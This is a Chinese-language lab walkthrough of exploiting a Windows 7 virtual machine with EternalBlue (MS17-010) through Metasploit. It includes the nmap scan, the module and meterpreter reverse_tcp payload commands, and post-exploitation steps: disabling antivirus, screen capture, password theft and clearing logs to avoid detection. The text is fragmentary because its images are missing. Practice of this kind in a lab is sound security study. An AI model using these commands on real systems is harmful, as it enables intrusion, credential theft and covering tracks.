win7虚拟机? ? ? ? ip

kali ip:

?采用nat的桥接模式:保证kali和win7能够通信

? ??nmap -sS -A? ? ? ? ? win7ip? ??(查看攻击对象win7所开放的所有端口)
msfconsole
(启动渗透框架)? 看到某个图案的这个渗透框架就运行了?

使用方法 ????进入框架:msfconsole ????使用search命令查找相关漏洞:?search??ms17-010 ????使用use进入模块:??use?exploit/windows/smb/ms17_010_eternalblue??? ????使用info查看模块信息:?info? ????设置攻击载荷:set?payload?windows/x64/meterpreter/reverse_tcp ????查看模块需要配置的参数:show?options ????设置参数:set??RHOST??192.168.125.138 ????攻击:exploit?/??run? ????后渗透阶段?
msfconsole?(查看ms17_010模块工具)
? ? ? 选择攻击模块:

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击
use? ? ? ? ? ? ? ? ? exploit/windows/smb/ms17_010_eternalblue? (使用攻击模块)
使用模块

search payload? ? ? ? ? ? 搜索攻击载荷??payload(用来查看攻击对象返回信息)
??

设置攻击载荷? ??设置一个反弹信息(渗透攻击后的查看被攻击对象返回的信息)
set payload windows/x64/meterpreter/reverse_tcp?
show options (显示配置选项)

set Rhosts 攻击对象ip (设置被攻击主机地址)

?exploit? ?攻击? (攻击成功)

?攻击成功后可以对被攻击对象做一些操作:? 如关闭杀毒软件,进入终端,窃取屏幕,获取用户密码等
? ?关闭杀毒软件

窃取win7虚拟机的屏幕(屏幕共享)

结果:

?窃取win7的某个用户密码

窃取密码

? ? ? ? 渗透完成后,把需要的事干完了,清除日志(让win7发现不了)

|